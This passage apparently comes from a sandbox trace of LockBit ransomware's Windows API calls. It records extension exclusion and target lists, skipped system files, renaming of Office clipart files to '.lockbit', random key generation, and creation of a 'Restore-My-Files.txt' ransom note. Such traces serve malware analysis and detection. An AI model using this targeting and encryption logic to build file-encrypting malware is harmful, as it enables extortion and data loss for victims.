returned -1 [0141.913] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.913] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.913] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107480.WMF") returned 1 [0141.914] lstrcmpiW (lpString1="ntldr", lpString2="J0107480.WMF") returned 1 [0141.914] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107480.WMF") returned 1 [0141.914] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107480.WMF") returned -1 [0141.914] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107480.WMF") returned -1 [0141.914] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107480.WMF") returned 1 [0141.914] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107480.WMF") returned -1 [0141.914] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.914] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF") returned=".WMF" [0141.914] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.914] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.914] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.915] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.915] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF.lockbit") returned 72 [0141.915] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107480.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.916] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.916] malloc (_Size=0x40068) returned 0x3df0008 [0141.916] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6024) returned 1 [0141.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0141.917] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0141.918] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.920] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.920] malloc (_Size=0xa6) returned 0x77d7a8 [0141.920] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.921] free (_Block=0x77d7a8) [0141.921] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107480.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.921] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.921] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.921] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1374, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107482.WMF", cAlternateFileName="")) returned 1 [0141.922] lstrcmpiW (lpString1=".", lpString2="J0107482.WMF") returned -1 [0141.922] lstrcmpiW (lpString1="..", lpString2="J0107482.WMF") returned -1 [0141.922] PathFindExtensionW (pszPath="J0107482.WMF") returned=".WMF" [0141.922] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.922] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.923] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.923] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107482.WMF") returned 1 [0141.924] lstrcmpiW (lpString1="ntldr", lpString2="J0107482.WMF") returned 1 [0141.924] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107482.WMF") returned 1 [0141.924] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107482.WMF") returned -1 [0141.924] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107482.WMF") returned -1 [0141.924] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107482.WMF") returned 1 [0141.924] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107482.WMF") returned -1 [0141.924] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.924] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF") returned=".WMF" [0141.924] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.924] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.924] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.925] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.925] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF.lockbit") returned 72 [0141.925] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107482.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0141.926] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.926] malloc (_Size=0x40068) returned 0x1ff1e60 [0141.926] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4980) returned 1 [0141.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0141.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0141.928] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0141.932] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.932] malloc (_Size=0xa6) returned 0x77d7a8 [0141.932] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.933] free (_Block=0x77d7a8) [0141.933] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107482.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.933] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.933] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.933] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbe0, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107484.WMF", cAlternateFileName="")) returned 1 [0141.933] lstrcmpiW (lpString1=".", lpString2="J0107484.WMF") returned -1 [0141.933] lstrcmpiW (lpString1="..", lpString2="J0107484.WMF") returned -1 [0141.933] PathFindExtensionW (pszPath="J0107484.WMF") returned=".WMF" [0141.933] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.933] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.933] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.933] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.933] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.933] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.933] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.933] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.933] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.934] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.934] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107484.WMF") returned 1 [0141.935] lstrcmpiW (lpString1="ntldr", lpString2="J0107484.WMF") returned 1 [0141.935] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107484.WMF") returned 1 [0141.935] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107484.WMF") returned -1 [0141.935] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107484.WMF") returned -1 [0141.935] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107484.WMF") returned 1 [0141.935] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107484.WMF") returned -1 [0141.935] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.935] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF") returned=".WMF" [0141.935] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.935] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.935] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.936] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.936] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF.lockbit") returned 72 [0141.936] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107484.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107484.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0141.940] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.940] malloc (_Size=0x40068) returned 0x3d70450 [0141.940] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3040) returned 1 [0141.940] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0141.941] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.941] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.941] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0141.941] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0141.944] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft 